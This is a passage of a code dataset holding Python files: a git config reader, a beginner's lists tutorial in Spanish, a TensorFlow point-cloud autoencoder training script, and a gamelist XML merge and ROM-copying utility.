self.path:\n if os.path.exists(self.path):\n\n config_path = self.detect_git_config(self.path)\n if os.path.exists(config_path):\n self.config_path = config_path\n self.config = ConfigFile.from_path(config_path)\n else:\n raise GitRepoNotFoundError(self.path)\n else:\n raise IOError(self.path)\n\n else:\n self.config = ConfigFile.from_file(self.file)\n\n def detect_git_config(self, path):\n config_path = \"\"\n if search(r'\\.git/config', path):\n config_path = path\n elif search(r'\\.git', path):\n config_path = \"{0}/config\".format(path)\n else:\n config_path = \"{0}/.git/config\".format(path)\n\n return config_path\n\n def has_remotes(self):\n return self.has_section('remote')\n\n def has_remote(self, remote_name):\n return self.has_section('remote', remote_name)\n\n def has_section(self, section_type, section_name = ''):\n config_sections = self.config.itersections()\n\n \"\"\"\n These variables are used in return statements only\n They are used to experiment with readability\n \"\"\"\n yes_there_is_section_with_this_name = yes_this_section_exists = True\n sorry_search_section_doest_not_exist = False\n\n\n for section in config_sections:\n this_section_type = section[0]\n search_for_section_with_spcific_name = (section_name != '')\n\n if not search_for_section_with_spcific_name:\n\n if this_section_type == section_type:\n return yes_this_section_exists # True\n else:\n try:\n this_section_name = section[1]\n if this_section_name == section_name:\n return yes_there_is_section_with_this_name # True\n except IndexError:\n \"\"\" These type of sections are like [core], [alias], [user]\"\"\"\n continue\n\n return sorry_search_section_doest_not_exist # False\n\n @property\n def remotes(self):\n config_sections = self.config.items()\n remotes = OrderedDict()\n\n for section in config_sections:\n section_type = section[0][0]\n if section_type == 'remote':\n\n remote_name = section[0][1]\n remote_properties = section[1]\n\n remotes[remote_name] = remote_properties\n\n return remotes\n\n @property\n def sections(self):\n config_sections = self.config.items()\n return [section[0][0] for section in config_sections]\n\n def set(self, section, key, value):\n return self.config.set((section,), key, value)\n\n def get(self, section, key):\n section_details = section.split('.')\n\n if len(section_details) == 2:\n section_type, section_name = section_details\n else:\n section_type, section_name = (section, '')\n\n return self.config.get((section_type, section_name), key)\n\n def save(self):\n return self.config.write_to_path(self.config_path)\n\n","repo_name":"mignev/startappsync","sub_path":"gitconfig/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18939600580","text":"#LISTAS\n\ndimension = [1,2,5,6,87,7]\ndosDimensiones= [[12,56],[14,125,13],[\"Hola\",\"Mundo\"],[True,False]]\ntablas = [[10,1,[0,53]], [20,2], [30,3]]\n\n\n##print(tablas[0][2][1])\n##print(tablas[1][1])\n\n##print(dosDimensiones[2][0] + \" \" + dosDimensiones[2][1])\n\"\"\"\nfor item in dosDimensiones:\n print(item)\n for valor in item:\n print(valor)\n \n \nfor cont in range(0,10,1):\n print(cont)\n \"\"\" \n\n## add append, remove, filter, map, reduce\n\n#Diccionarios\nmaterias = {\n \"nombre\": \"Matematicas\",\n \"codigo\": \"T1248\",\n \"UV\": 4,\n 
\"estado\":False\n}\n\nprint(materias[\"nombre\"])\nprint(materias[\"codigo\"])","repo_name":"UntalivanCruz/319estructuraI","sub_path":"semana2/arrays/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27187519960","text":"\"\"\"Code for training CycleGAN.\"\"\"\r\nfrom datetime import datetime\r\nimport json\r\nimport numpy as np\r\nimport os\r\n# import random\r\nimport imageio\r\nfrom open3d import *\r\n\r\nimport click\r\nimport tensorflow as tf\r\n# from skimage import io,transform\r\nimport sklearn.preprocessing\r\n\r\nimport losses\r\nimport model_ae_pc_adaptive as model\r\nfrom shapenet_dataset_ae import *\r\nfrom visu_utils import point_cloud_one_view\r\nimport provider\r\n\r\nslim = tf.contrib.slim\r\n\r\nDECAY_STEP = 100000\r\nDECAY_RATE = 0.7\r\n\r\nBN_INIT_DECAY = 0.5\r\nBN_DECAY_CLIP = 0.99\r\nBN_DECAY_DECAY_STEP = float(DECAY_STEP)\r\nBN_DECAY_DECAY_RATE = 0.5\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\r\n\r\ndef camera_info(param):\r\n theta = np.deg2rad(param[0])\r\n phi = np.deg2rad(param[1])\r\n\r\n camY = param[3]*np.sin(phi)\r\n temp = param[3]*np.cos(phi)\r\n camX = temp * np.cos(theta) \r\n camZ = temp * np.sin(theta) \r\n cam_pos = np.array([camX, camY, camZ]) \r\n\r\n axisZ = cam_pos.copy()\r\n axisY = np.array([0,1,0])\r\n axisX = np.cross(axisY, axisZ)\r\n axisY = np.cross(axisZ, axisX)\r\n\r\n cam_mat = np.array([axisX, axisY, axisZ])\r\n cam_mat = sklearn.preprocessing.normalize(cam_mat, axis=1)\r\n return cam_mat, cam_pos\r\n\r\ndef rotate_point_cloud(xyz): # rotate point clouds z-upwards\r\n R_x = np.array([[1, 0, 0],\r\n [0, 0, -1],\r\n [0, 1, 0]])\r\n R_y = np.array([[0, 0, 1],\r\n [0, 1, 0],\r\n [-1, 0, 0]])\r\n xyz_rotated = np.dot(xyz, R_x)\r\n xyz_rotated = np.dot(xyz_rotated, R_y)\r\n\r\n cam_mat, _ = camera_info([45., 25.0, 0, 1.25])\r\n final_pc = np.dot(xyz_rotated, cam_mat.transpose())\r\n return final_pc\r\n\r\nclass AE_PC:\r\n\r\n def __init__(self, output_root_dir, to_restore, to_train,\r\n base_lr, max_step, checkpoint_dir, data_list_train, data_list_test):\r\n current_time = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\r\n\r\n if to_train == 0:\r\n self._output_dir = os.path.join(output_root_dir, \"test_ae_pc\")\r\n else:\r\n self._output_dir = os.path.join(output_root_dir, current_time)\r\n self._images_dir = os.path.join(self._output_dir, 'imgs')\r\n self._point_clouds_dir = os.path.join(self._output_dir, 'pcs')\r\n self._num_imgs_to_save = 20\r\n self._to_restore = to_restore\r\n self._base_lr = base_lr\r\n self._max_step = max_step\r\n self._checkpoint_dir = checkpoint_dir\r\n self._data_list_train = data_list_train\r\n self._data_list_test = data_list_test\r\n\r\n def load(self, checkpoint_dir_ae_pc, sess=None):\r\n if not sess:\r\n raise AttributeError(\"TensorFlow session not provided.\")\r\n self.model_setup()\r\n sess.run(tf.global_variables_initializer())\r\n saver = tf.train.Saver([v for v in tf.all_variables() if 'AE_PC' in v.name])\r\n chkpt_fname = tf.train.latest_checkpoint(checkpoint_dir_ae_pc)\r\n saver.restore(sess, chkpt_fname)\r\n\r\n def get_learning_rate(self, batch):\r\n learning_rate = tf.train.exponential_decay(\r\n self._base_lr, \r\n batch * model.BATCH_SIZE, \r\n DECAY_STEP, \r\n DECAY_RATE, \r\n staircase=True)\r\n learning_rate = tf.maximum(learning_rate, 0.00001) \r\n return learning_rate\r\n\r\n def model_setup(self):\r\n \"\"\"\r\n This function sets up the model to 
train.\r\n\r\n \"\"\"\r\n self.input_pc = tf.placeholder(\r\n tf.float32, [\r\n None,\r\n model.PC_POINTS,\r\n model.PC_CHANNELS\r\n ], name=\"input_pc_pl\")\r\n\r\n self.input_normals_pc = tf.placeholder(\r\n tf.float32, [\r\n None,\r\n model.PC_POINTS,\r\n model.PC_CHANNELS\r\n ], name=\"input_normals_pl\")\r\n \r\n self.input_features_pc = tf.placeholder(\r\n tf.float32, [\r\n None,\r\n model.PC_FEATURES\r\n ], name=\"features_pc_pl\"\r\n )\r\n\r\n self.surface_area_pc = tf.placeholder(\r\n tf.float32, [\r\n None\r\n ], name=\"surface_area\"\r\n )\r\n\r\n self.global_step = slim.get_or_create_global_step()\r\n\r\n self.num_fake_inputs = 0\r\n\r\n self.is_training = tf.placeholder(tf.bool, shape=[], name=\"is_training\")\r\n self.batch = tf.get_variable('batch', [], initializer=tf.constant_initializer(0), trainable=False)\r\n self.learning_rate = self.get_learning_rate(self.batch)\r\n\r\n inputs = {\r\n 'input_pc': self.input_pc,\r\n 'input_normals_pc': self.input_normals_pc,\r\n 'input_features_pc': self.input_features_pc,\r\n 'bn_decay': None,\r\n 'is_training': self.is_training\r\n }\r\n\r\n outputs = model.get_outputs(inputs)\r\n\r\n self.out_features_pc = outputs['out_features_pc']\r\n self.out_pc = outputs['out_pc']\r\n self.out_pc_from_features = outputs['out_pc_from_features']\r\n\r\n def compute_losses(self):\r\n \"\"\"\r\n In this function we are defining the variables for loss calculations\r\n and training model.\r\n \"\"\"\r\n\r\n emd_loss = losses.emd(self.out_pc, self.input_pc)\r\n chamfer_loss, d1, d2 = losses.chamfer(self.out_pc, self.input_pc)\r\n particle_loss, corrected_proj_x, proj_x, queries, normals = losses.particle_loss(self.out_pc, self.input_pc, self.input_normals_pc, self.surface_area_pc)\r\n uniformity_mean_pred, uniformity_std_pred, uniformity_mean_gt, uniformity_std_gt = losses.evaluate_uformity(self.out_pc, self.input_pc)\r\n\r\n loss = emd_loss + particle_loss\r\n\r\n optimizer = tf.train.AdamOptimizer(self.learning_rate)\r\n\r\n self.model_vars = tf.trainable_variables()\r\n\r\n enc_pc_vars = [var for var in self.model_vars if 'enc_pc' in var.name]\r\n dec_pc_vars = [var for var in self.model_vars if 'dec_pc' in var.name]\r\n\r\n self.ae_pc_trainer = optimizer.minimize(loss, var_list=[enc_pc_vars, dec_pc_vars], global_step=self.batch)\r\n\r\n for var in self.model_vars:\r\n print(var.name)\r\n\r\n # Summary variables for tensorboard\r\n self.emd_loss = emd_loss\r\n self.cd_loss = chamfer_loss\r\n self.d1 = d1,\r\n self.d2 = d2,\r\n self.uniformity_mean_pred = uniformity_mean_pred\r\n self.uniformity_std_pred = uniformity_std_pred\r\n self.uniformity_mean_gt = uniformity_mean_gt\r\n self.uniformity_std_gt = uniformity_std_gt\r\n self.corrected_proj_x = corrected_proj_x\r\n self.proj_x = proj_x,\r\n self.queries = queries,\r\n self.normals = normals,\r\n self.ae_pc_loss = tf.summary.scalar(\"total_loss\", loss)\r\n self.ae_pc_loss_emd = tf.summary.scalar(\"emd_loss\", emd_loss)\r\n self.ae_pc_particle_loss = tf.summary.scalar(\"particle loss\", particle_loss)\r\n self.ae_pc_lr = tf.summary.scalar('lr', self.learning_rate)\r\n\r\n def save_test_images(self, sess, epoch, data):\r\n \"\"\"\r\n Saves input and output images.\r\n\r\n :param sess: The session.\r\n :param epoch: Current epoch.\r\n \"\"\"\r\n\r\n if not os.path.exists(self._images_dir):\r\n os.makedirs(self._images_dir)\r\n \r\n if not os.path.exists(self._point_clouds_dir):\r\n os.makedirs(self._point_clouds_dir)\r\n\r\n names_pc = ['inputPC_', 'reconstructedPC_', 'reconstructedPCfromFEAT_', 
'pc_sampl_1_', 'pc_sampl_2_', 'pc_sampl_3_']\r\n\r\n with open(os.path.join(self._output_dir, 'epoch_pc_' + str(epoch) + '.html'), 'w') as v_pc_html:\r\n for i in range(0, self._num_imgs_to_save):\r\n print(\"Saving image {}/{}\".format(i, self._num_imgs_to_save))\r\n input_pc_, surface_area_pc, _ = data.next_batch()\r\n input_pc = input_pc_[:,:,:3]\r\n input_normals_pc = input_pc_[:,:,3:]\r\n\r\n out_features_pc, reconstructed_pc = sess.run([\r\n self.out_features_pc,\r\n self.out_pc\r\n ], feed_dict={\r\n self.input_pc: input_pc,\r\n self.input_normals_pc: input_normals_pc,\r\n self.surface_area_pc: surface_area_pc,\r\n self.is_training: False\r\n })\r\n\r\n reconstructed_from_features_pc= sess.run([\r\n self.out_pc_from_features,\r\n ], feed_dict={\r\n self.input_features_pc: out_features_pc,\r\n self.is_training: False\r\n })[0]\r\n\r\n input_pc = rotate_point_cloud(input_pc)\r\n reconstructed_pc = rotate_point_cloud(reconstructed_pc)\r\n reconstructed_from_features_pc = rotate_point_cloud(reconstructed_from_features_pc)\r\n\r\n tensors_pc = [input_pc, reconstructed_pc, reconstructed_from_features_pc]\r\n\r\n v_pc_html.write(\"
      Object: \"+str(i+1)+\"

      \")\r\n\r\n for name, tensor in zip(names_pc, tensors_pc):\r\n points = tensor[0]\r\n pc_name = name + str(epoch) + \"_\" + str(i) + \".obj\"\r\n out_filename = os.path.join(self._point_clouds_dir, pc_name)\r\n fout = open(out_filename, 'w')\r\n for j in range(points.shape[0]):\r\n fout.write('v %f %f %f\\n' % (points[j,0], points[j,1], points[j,2]))\r\n fout.close()\r\n\r\n # save point cloud as an image\r\n image_input_x = point_cloud_one_view(points)\r\n image_name = name + str(epoch) + \"_\" + str(i) + \".jpg\"\r\n imageio.imsave(os.path.join(self._images_dir, image_name), (image_input_x*255.0).astype(np.uint8))\r\n v_pc_html.write(\"\")\r\n v_pc_html.write(\"
      \")\r\n \r\n def train(self):\r\n \"\"\"Training Function.\"\"\"\r\n # Load Training and Testing Dataset\r\n TRAIN_DATASET = ShapeNetDataset(self._data_list_train, batch_size=model.BATCH_SIZE)\r\n TEST_DATASET = ShapeNetDataset(self._data_list_test, batch_size=1)\r\n\r\n # Build the network\r\n self.model_setup()\r\n\r\n # Loss function calculations\r\n self.compute_losses()\r\n\r\n # Initializing the global variables\r\n init = (tf.global_variables_initializer(),\r\n tf.local_variables_initializer())\r\n saver = tf.train.Saver()\r\n\r\n max_batches = TRAIN_DATASET.get_num_batches()\r\n\r\n config=tf.ConfigProto()\r\n config.gpu_options.allow_growth=True\r\n config.allow_soft_placement=True\r\n config.log_device_placement = False\r\n\r\n with tf.Session(config=config) as sess:\r\n sess.run(init)\r\n\r\n # Restore the model to run the model from last checkpoint\r\n if self._to_restore:\r\n chkpt_fname = tf.train.latest_checkpoint(self._checkpoint_dir)\r\n saver.restore(sess, chkpt_fname)\r\n\r\n writer = tf.summary.FileWriter(self._output_dir)\r\n\r\n if not os.path.exists(self._output_dir):\r\n os.makedirs(self._output_dir)\r\n\r\n # Training Loop\r\n for epoch in range(sess.run(self.global_step), self._max_step + 1):\r\n print(\"In the epoch \", epoch)\r\n\r\n batch_idx = 0\r\n while TRAIN_DATASET.has_next_batch():\r\n print(\"Processing batch {}/{}\".format(batch_idx, max_batches))\r\n\r\n input_pc_, surface_area_pc, _ = TRAIN_DATASET.next_batch()\r\n input_pc_ = provider.shuffle_points(input_pc_)\r\n input_pc = input_pc_[:,:,:3]\r\n input_normals_pc = input_pc_[:,:,3:]\r\n\r\n _, summary_loss_total, summary_loss_emd, summary_particle_loss, summary_lr = sess.run(\r\n [self.ae_pc_trainer,\r\n self.ae_pc_loss,\r\n self.ae_pc_loss_emd,\r\n self.ae_pc_particle_loss,\r\n self.ae_pc_lr\r\n ],\r\n feed_dict={\r\n self.input_pc: input_pc,\r\n self.input_normals_pc: input_normals_pc,\r\n self.surface_area_pc: surface_area_pc,\r\n self.is_training: True\r\n }\r\n )\r\n writer.add_summary(summary_loss_total, epoch * max_batches + batch_idx)\r\n writer.add_summary(summary_loss_emd, epoch * max_batches + batch_idx)\r\n writer.add_summary(summary_particle_loss, epoch * max_batches + batch_idx)\r\n writer.add_summary(summary_lr, epoch * max_batches + batch_idx)\r\n\r\n writer.flush()\r\n batch_idx += 1\r\n \r\n saver.save(sess, os.path.join(self._output_dir, \"ae_pc\"))\r\n\r\n batch_idx = 0\r\n self.save_test_images(sess, epoch, TEST_DATASET)\r\n TEST_DATASET.start_from_the_first_batch_again()\r\n TRAIN_DATASET.reset_one_view()\r\n sess.run(tf.assign(self.global_step, epoch + 1))\r\n\r\n writer.add_graph(sess.graph)\r\n\r\n def f_score(self, label, predict, dist_label, dist_pred, threshold):\r\n num_label = label.shape[0]\r\n num_predict = predict.shape[0]\r\n\r\n f_scores = []\r\n for i in range(len(threshold)):\r\n num = len(np.where(dist_label <= threshold[i])[0])\r\n recall = 100.0 * num / num_label\r\n num = len(np.where(dist_pred <= threshold[i])[0])\r\n precision = 100.0 * num / num_predict\r\n\r\n f_scores.append((2*precision*recall)/(precision+recall+1e-8))\r\n return np.array(f_scores)\r\n\r\n def evaluate_test_emd_and_uniformity_loss(self, sess, data):\r\n batch_idx = 0\r\n max_batches = data.get_num_batches()\r\n\r\n class_name = 
{\t'02691156':'plane',\r\n\t\t\t\t'02828884':'bench',\r\n\t\t\t\t'02933112':'cabinet',\r\n\t\t\t\t'02958343':'car',\r\n\t\t\t\t'03001627':'chair',\r\n\t\t\t\t'03211117':'monitor',\r\n\t\t\t\t'03636649':'lamp',\r\n\t\t\t\t'03691459':'speaker',\r\n\t\t\t\t'04090263':'firearm',\r\n\t\t\t\t'04256520':'couch',\r\n\t\t\t\t'04379243':'table',\r\n\t\t\t\t'04401088':'cellphone',\r\n\t\t\t\t'04530566':'watercraft'\r\n\t\t\t\t}\r\n model_number = {i:0 for i in class_name}\r\n sum_f = {i:0 for i in class_name}\r\n sum_cd = {i:0 for i in class_name}\r\n sum_emd = {i:0 for i in class_name}\r\n sum_uniformity_mean_pred = {i:0 for i in class_name}\r\n sum_uniformity_std_pred = {i:0 for i in class_name}\r\n sum_uniformity_mean_gt = {i:0 for i in class_name}\r\n sum_uniformity_std_gt = {i:0 for i in class_name}\r\n\r\n if not os.path.exists(self._output_dir):\r\n os.makedirs(self._output_dir)\r\n\r\n while data.has_next_batch():\r\n if batch_idx % 100 == 0:\r\n print(\"Processing batch {}/{}\".format(batch_idx, max_batches))\r\n input_pc_, surface_area_pc, model_id = data.next_batch()\r\n input_pc = input_pc_[:,:,:3]\r\n input_normals_pc = input_pc_[:,:,3:]\r\n\r\n emd_loss, cd_loss, d1, d2, out_pc, uniformity_mean_pred, uniformity_std_pred, uniformity_mean_gt, uniformity_std_gt = sess.run(\r\n [self.emd_loss, \r\n self.cd_loss,\r\n self.d1,\r\n self.d2,\r\n self.out_pc,\r\n self.uniformity_mean_pred,\r\n self.uniformity_std_pred,\r\n self.uniformity_mean_gt,\r\n self.uniformity_std_gt],\r\n feed_dict={\r\n self.input_pc: input_pc,\r\n self.input_normals_pc: input_normals_pc,\r\n self.surface_area_pc: surface_area_pc,\r\n self.is_training: False\r\n }\r\n )\r\n\r\n class_id = model_id[0]\r\n model_number[class_id] += 1.0\r\n sum_emd[class_id] += emd_loss\r\n sum_cd[class_id] += cd_loss\r\n sum_f[class_id] += self.f_score(input_pc[0],out_pc[0],d1[0],d2[0],[0.0002, 0.0004])\r\n sum_uniformity_mean_pred[class_id] += uniformity_mean_pred\r\n sum_uniformity_std_pred[class_id] += uniformity_std_pred\r\n sum_uniformity_mean_gt[class_id] += uniformity_mean_gt\r\n sum_uniformity_std_gt[class_id] += uniformity_std_gt\r\n batch_idx += 1\r\n \r\n cd_sum = 0.0\r\n emd_sum = 0.0\r\n f_sum = 0.0\r\n uniformity_mean_pred_sum = 0.0\r\n uniformity_std_pred_sum = 0.0\r\n uniformity_mean_gt_sum = 0.0\r\n uniformity_std_gt_sum = 0.0\r\n\r\n log = open(os.path.join(self._output_dir, 'record_evaluation.txt'), 'a')\r\n\r\n for item in model_number:\r\n number = model_number[item] + 1e-8\r\n emd = (sum_emd[item] / number) * 0.01\r\n cd = (sum_cd[item] / number) * 1000\r\n f = sum_f[item] / number\r\n uniform_mean_pred = sum_uniformity_mean_pred[item] / number\r\n uniform_std_pred = sum_uniformity_std_pred[item] / number\r\n uniform_mean_gt = sum_uniformity_mean_gt[item] / number\r\n uniform_std_gt = sum_uniformity_std_gt[item] / number\r\n cd_sum += cd\r\n f_sum += f\r\n emd_sum += emd\r\n uniformity_mean_pred_sum += uniform_mean_pred\r\n uniformity_std_pred_sum += uniform_std_pred\r\n uniformity_mean_gt_sum += uniform_mean_gt\r\n uniformity_std_gt_sum += uniform_std_gt\r\n\r\n print(class_name[item], int(number), f, cd, emd, uniform_mean_pred, uniform_std_pred, uniform_mean_gt, uniform_std_gt)\r\n log.write(str(class_name[item]) + ', ' + str(int(number)) + ', ' + str(f) + ', ' + str(cd) + ', ' + str(emd) \\\r\n + ', ' + str(uniform_mean_pred) + ', ' + str(uniform_std_pred) + ', ' + str(uniform_mean_gt) + ', ' + str(uniform_std_gt) + '\\n')\r\n\r\n # print('mean: ', f_sum/13.0, cd_sum/13.0 , emd_sum/13.0, \\\r\n # 
uniformity_mean_pred_sum/13.0, uniformity_std_pred_sum/13.0, uniformity_mean_gt_sum/13.0, uniformity_std_gt_sum/13.0)\r\n log.write('mean: ' + str(f_sum/13.0) + ', ' + str(cd_sum/13.0) + ', ' + str(emd_sum/13.0) \\\r\n + ', ' + str(uniformity_mean_pred_sum/13.0) + ', ' + str(uniformity_std_pred_sum/13.0) \\\r\n + ', ' + str(uniformity_mean_gt_sum/13.0) + ', ' + str(uniformity_std_gt_sum/13.0) + '\\n')\r\n log.close()\r\n\r\n def test(self):\r\n \"\"\"Test Function.\"\"\"\r\n\r\n TEST_DATASET = ShapeNetDataset(self._data_list_test, batch_size=1)\r\n\r\n self.model_setup()\r\n self.compute_losses()\r\n saver = tf.train.Saver()\r\n init = tf.global_variables_initializer()\r\n\r\n config=tf.ConfigProto()\r\n config.gpu_options.allow_growth=True\r\n config.allow_soft_placement=True\r\n config.log_device_placement = False\r\n\r\n with tf.Session(config=config) as sess:\r\n sess.run(init)\r\n\r\n chkpt_fname = tf.train.latest_checkpoint(self._checkpoint_dir)\r\n saver.restore(sess, chkpt_fname)\r\n\r\n self.evaluate_test_emd_and_uniformity_loss(sess, TEST_DATASET)\r\n TEST_DATASET.start_from_the_first_batch_again()\r\n self.save_test_images(sess, \"test\", TEST_DATASET)\r\n\r\n\r\n@click.command()\r\n@click.option('--to_train',\r\n type=click.INT,\r\n default=True,\r\n help='Whether it is train or false.')\r\n@click.option('--log_dir',\r\n type=click.STRING,\r\n default=None,\r\n help='Where the data is logged to.')\r\n@click.option('--config_filename',\r\n type=click.STRING,\r\n default='train',\r\n help='The name of the configuration file.')\r\n@click.option('--checkpoint_dir',\r\n type=click.STRING,\r\n default='',\r\n help='The name of the train/test split.')\r\ndef main(to_train, log_dir, config_filename, checkpoint_dir):\r\n \"\"\"\r\n\r\n :param to_train: Specify whether it is training or testing. 1: training; 2:\r\n resuming from latest checkpoint; 0: testing.\r\n :param log_dir: The root dir to save checkpoints and imgs. The actual dir\r\n is the root dir appended by the folder with the name timestamp.\r\n :param config_filename: The configuration file.\r\n :param checkpoint_dir: The directory that saves the latest checkpoint. 
It\r\n only takes effect when to_train == 2.\r\n :param skip: A boolean indicating whether to add skip connection between\r\n input and output.\r\n \"\"\"\r\n if not os.path.isdir(log_dir):\r\n os.makedirs(log_dir)\r\n\r\n with open(config_filename) as config_file:\r\n config = json.load(config_file)\r\n\r\n to_restore = (to_train == 2)\r\n base_lr = float(config['base_lr']) if 'base_lr' in config else 0.0002\r\n max_step = int(config['max_step']) if 'max_step' in config else 200\r\n data_list_train = str(config['data_list_train'])\r\n data_list_test = str(config['data_list_test'])\r\n\r\n ae_model = AE_PC(log_dir, to_restore, to_train, base_lr, max_step, checkpoint_dir, data_list_train, data_list_test)\r\n\r\n if to_train > 0:\r\n ae_model.train()\r\n else:\r\n ae_model.test()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"akomarichev/joint_latent_space","sub_path":"main_ae_pc_adaptive.py","file_name":"main_ae_pc_adaptive.py","file_ext":"py","file_size_in_byte":21694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72134822632","text":"#!/usr/bin/env python3\n\nimport os, sys, shutil, argparse, re, glob, shutil\nimport xml.etree.ElementTree as ET\n\n\ndef normalize_dir(path):\n\treturn os.path.expanduser(path).rstrip('/')+'/'\n\n\ndef get_cue_filelist(fn):\n\tdir = os.path.dirname(fn)\n\tentries = [L for L in open(fn).readlines() if L.strip().startswith('FILE')]\n\tout = [L[L.find('\"')+1:L.rfind('\"')] for L in entries]\n\treturn [dir+'/'+f for f in out]\n\n\ndef get_m3u_filelist(fn):\n\tdir = os.path.dirname(fn)\n\tentries = [L.strip() for L in open(fn).readlines() if L.strip()]\n\treturn [dir+'/'+f for f in entries]\n\n\ndef get_game_id(game):\n\tglobal key, normalize\n\tif game.find(key) == None:\n\t\treturn None\n\ts = os.path.basename(game.find(key).text)\n\treturn normalize(s)\n\n\ndef getFileSize(fn):\n\ttry:\n\t\tret = os.path.getsize(fn)\n\t\tif fn.lower().endswith('.cue'):\n\t\t\tret += sum([os.path.getsize(f1) for f1 in get_cue_filelist(fn)])\n\t\telif fn.lower().endswith('.m3u'):\n\t\t\tret += sum([os.path.getsize(f1) for f1 in get_m3u_filelist(fn)])\n\t\treturn ret\n\texcept:\n\t\treturn 0\n\n\ndef deleteFileIfNeeded(path, fn): # non-ROM\n\ttry:\n\t\tprint(f'Deleting {path+fn} ...', file = sys.stderr)\n\t\tos.remove(path+fn)\n\texcept FileNotFoundError as e:\n\t\tpass\n\texcept Exception as e:\n\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\n\ndef copyOverFileIfNeeded(src_path, src_fn, dst_path, dst_fn): # non-ROM\n\ttry:\n\t\tif src_path=='' or dst_path=='' or not src_fn.startswith('./') or not dst_fn.startswith('./'):\n\t\t\treturn\n\t\tsrc_full = src_path + src_fn[2:]\n\t\tdst_full = dst_path + dst_fn[2:]\n\t\tsrc_size, dst_size = getFileSize(src_full), getFileSize(dst_full)\n\texcept:\n\t\tpass\n\tif src_size != dst_size and src_size:\n\t\ttry:\n\t\t\tprint(f'Copying {src_full} -> {dst_full}', file = sys.stderr)\n\t\t\tos.makedirs(os.path.dirname(dst_full), exist_ok = True)\n\t\t\tshutil.copyfile(src_full, dst_full)\n\t\texcept Exception as e:\n\t\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\n\ndef copyRomFiles(src_full, dst_path):\n\tdef copy_file(src_fn, tgt):\n\t\ttry:\n\t\t\tdst_fn = tgt + os.path.basename(src_fn) if os.path.isdir(tgt) else tgt\n\t\t\tsrc_size, dst_size = getFileSize(src_fn), getFileSize(dst_fn)\n\t\t\tif src_size != dst_size and src_size:\n\t\t\t\tprint(f'Copying {src_fn} -> {tgt}', file = sys.stderr)\n\t\t\t\tshutil.copy(src_fn, 
tgt)\n\t\t\telse:\n\t\t\t\tprint(f'Skipping {src_fn} == {dst_fn}', file = sys.stderr)\n\t\texcept shutil.SameFileError:\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\n\tos.makedirs(os.path.dirname(dst_path), exist_ok = True)\n\tsrc_patn = src_full.rsplit('.', 1)[0] + '.*'\n\tprint(f'Copying {src_patn} -> {dst_path}', file = sys.stderr)\n\tfor file in glob.glob(src_patn.replace('[','[[]').replace(']','[]]')):\n\t\tcopy_file(file, dst_path)\n\tif src_full.lower().endswith('.cue'):\n\t\tfor file in get_cue_filelist(src_full):\n\t\t\tcopy_file(file, dst_path)\n\telif src_full.lower().endswith('.m3u'):\n\t\tfor file in get_m3u_filelist(src_full):\n\t\t\tcopy_file(file, dst_path)\n\n\ndef deleteRomFiles(src_full):\n\tdef del_file(filename):\n\t\tprint(f'Deleting {filename} ...', file = sys.stderr)\n\t\ttry:\n\t\t\tos.remove(filename)\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\tprint(f'Error: {str(e)}', file = sys.stderr)\n\tsrc_patn = src_full.rsplit('.', 1)[0] + '.*'\n\tfor filename in glob.glob(src_patn.replace('[','[[]').replace(']','[]]')):\n\t\tif filename.lower().endswith('.cue'):\n\t\t\tfor fn in get_cue_filelist(filename):\n\t\t\t\tdel_file(fn)\n\t\telif filename.lower().endswith('.m3u'):\n\t\t\tfor fn in get_m3u_filelist(filename):\n\t\t\t\tdel_file(fn)\n\t\tdel_file(filename)\n\n\ndef gamelist_verify(source, src_path):\n\tprint(f'Parsing {source} ...', end = ' ', flush = True, file = sys.stderr)\n\tsrc_tree = ET.parse(source)\n\tsrc_root = src_tree.getroot()\n\tprint(f\"{len(src_root)} entries\", file = sys.stderr)\n\n\t# main loop\n\tfor game in src_root.findall('game'):\n\t\tgame_info = {d.tag: d.text for d in game}\n\t\tfor k, v in game_info.items():\n\t\t\tif v is None: continue\n\t\t\tif not v.startswith('./'): continue\n\t\t\tif getFileSize(src_path, v[2:]) == 0:\n\t\t\t\tprint(f'Missing file: {src_path+v[2:]}')\n\t\t\telif v.lower().endswith('.m3u'):\n\t\t\t\tfor fn in get_m3u_filelist(src_path+v[2:]):\n\t\t\t\t\tif getFileSize(fn) == 0:\n\t\t\t\t\t\tprint(f'Missing M3U: {src_path+v[2:]}')\n\t\t\telif v.lower().endswith('.cue'):\n\t\t\t\tfor fn in get_cue_filelist(src_path+v[2:]):\n\t\t\t\t\tif getFileSize(fn) == 0:\n\t\t\t\t\t\tprint(f'Missing CUE: {src_path+v[2:]}')\n\n\ndef gamelist_merge(output, sources, out_path, src_dirs, rule):\n\tglobal key\n\n\tif not sources:\n\t\treturn ET.ElementTree()\n\n\tgame_dict = {}\n\tprint(f'Parsing {sources[0]} as baseline ...', end = ' ', flush = True)\n\tout_tree = ET.parse(sources[0])\n\tout_root = out_tree.getroot()\n\tprint(f\"{len(out_root)} entries\")\n\n\t# clear output tree\n\tfor i in out_root.findall('game'):\n\t\tout_root.remove(i)\n\n\t# iterate over every source file\n\tfor source, src_path in zip(sources, src_dirs):\n\t\tprint(f'Parsing {source} ...', end = ' ', flush = True)\n\t\tsrc_tree = ET.parse(source)\n\t\tsrc_root = src_tree.getroot()\n\t\tprint(f\"{len(src_root)} entries\")\n\n\t\t# main loop\n\t\tfor game in src_root.findall('game'):\n\t\t\tgame_id = get_game_id(game)\n\t\t\tif not game_id: continue\n\t\t\tif game_id not in game_dict: # new entry, copy over all files\n\t\t\t\tif getFileSize(src_path+game.find(key).text) == 0: # missing ROM, discard\n\t\t\t\t\tcontinue\n\t\t\t\tgame_dict[game_id] = game\n\t\t\t\tout_root.append(game)\n\t\t\t\tfor entry in game:\n\t\t\t\t\tif entry.text and 